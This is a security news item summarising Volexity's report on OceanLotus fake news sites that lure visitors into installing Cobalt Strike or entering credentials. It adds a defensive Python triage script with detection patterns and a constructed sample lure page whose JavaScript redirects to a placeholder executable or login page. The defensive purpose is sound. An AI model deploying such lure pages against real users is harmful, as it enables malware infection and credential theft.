Researchers at Volexity report that the Vietnamese threat actor OceanLotus has been using phony news and bogus activist websites to track users, or to trick them into downloading malware. Notably, the websites were convincing enough that the researchers initially thought they were legitimate news sites that had been compromised by a threat actor. Additionally, most of the content on the sites was harmless, containing thousands of articles scraped from legitimate news outlets, with only certain articles containing malicious redirects.
“However, upon closer inspection of the websites, Volexity found the sites were not compromised, instead they were created and operated by OceanLotus,” the researchers write. “Each of the websites appears to have had a decent level of effort to build it, as there are numerous variations in themes, content, and even custom images and slogans. The websites all claim to be news sites and contain a great deal of benign content, with no malicious redirects or profiling in place on the vast majority of pages including the main index page. Instead, generally speaking, only a handful of specific articles within each site contain malicious content.”
The researchers believe users were directed to these malicious pages via links in spear phishing emails and social media messages. The sites also acted as watering holes, allowing the threat actor to collect information on users who were interested in certain topics and found the sites on their own.
The pages would collect information about visitors and, in some cases, attempt to trick the user into installing malware. For example, one of the pages used JavaScript to display a fake video player that appeared to load a news video and then showed an error. The user would then be told they needed to download Flash in order to play the video. If the user clicked the download button, they'd be infected with the Cobalt Strike hacking tool.
Interestingly, if the same page detected that the user was on a mobile device, it would instead inform them that they needed to sign in to confirm their age before viewing the video. If the user clicked the button to sign in, they’d be taken to a credential-harvesting page.
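As an added defender-side example (not Volexity's code and not from the original post), the Python triage script below scans a saved article page for the combination of traits described above: a script that branches on the user agent, a Flash update prompt, an age-gate sign-in, and a link to an executable. The detection patterns and both sample pages are constructed for illustration and assume nothing about the real sites beyond what the post describes.

```python
import re
from html.parser import HTMLParser

# Constructed heuristics for the lure the post describes: a "video" that fails, then a Flash update prompt on desktop or an age-gate sign-in on mobile.
UA_BRANCH = re.compile(r"navigator\.userAgent", re.I)
FLASH_LURE = re.compile(r"flash[^<]{0,40}(download|install|update)|(download|install|update)[^<]{0,40}flash", re.I)
AGE_SIGNIN = re.compile(r"(sign|log)\s*in[^<]{0,40}\bage\b", re.I)
EXEC_LINK = re.compile(r"https?://[^\s'\"<>]+\.(exe|msi|hta|zip|dmg)\b", re.I)

class PageParts(HTMLParser):
    """Split a page into inline script source, link targets and visible text."""
    def __init__(self):
        super().__init__()
        self.scripts, self.hrefs, self.text, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self._in_script = self._in_script or tag == "script"
        if tag in ("a", "form") and (a.get("href") or a.get("action")):
            self.hrefs.append(a.get("href") or a.get("action"))
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)

def triage_page(html: str) -> list:
    """Return the sorted names of lure indicators found in one page."""
    p = PageParts(); p.feed(html); p.close()
    js, visible, links = "".join(p.scripts), " ".join(p.text), " ".join(p.hrefs)
    checks = {"ua_branching": (UA_BRANCH, js), "flash_update_lure": (FLASH_LURE, js + visible),
              "age_signin_lure": (AGE_SIGNIN, js + visible), "executable_download": (EXEC_LINK, js + links)}
    return sorted(name for name, (rx, hay) in checks.items() if rx.search(hay))

def is_suspicious(html: str) -> bool:
    """Two or more indicators on one article page warrant analyst review."""
    return len(triage_page(html)) >= 2

# Constructed samples: a lure page modelled on the post's description, and a benign article.
LURE_HTML = """<html><body><h1>Breaking: protest footage</h1><div id="player">Loading...</div><script>
var mobile = /Android|iPhone|iPad/i.test(navigator.userAgent);
function showError() {
  var box = document.getElementById("player");
  if (mobile) { box.textContent = "Please sign in to confirm your age before viewing.";
                location.href = "https://login-example.invalid/verify"; }
  else { box.textContent = "Error: your Flash player is out of date. Download Flash to watch.";
         location.href = "https://cdn-example.invalid/flash_update.exe"; }
}
setTimeout(showError, 3000);</script></body></html>"""
BENIGN_HTML = """<html><body><h1>Flash floods hit the coast</h1><p>Residents were moved to shelters on Tuesday, officials said.</p>
<script>console.log("article loaded");</script></body></html>"""
```

Because the lure text only appears after a delay and inside script strings, scanning the visible HTML alone would miss it; the script source is inspected separately for that reason.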
New-school security awareness training can help your employees maintain a healthy sense of suspicion even when they’re not expecting to be attacked.
Volexity has the story.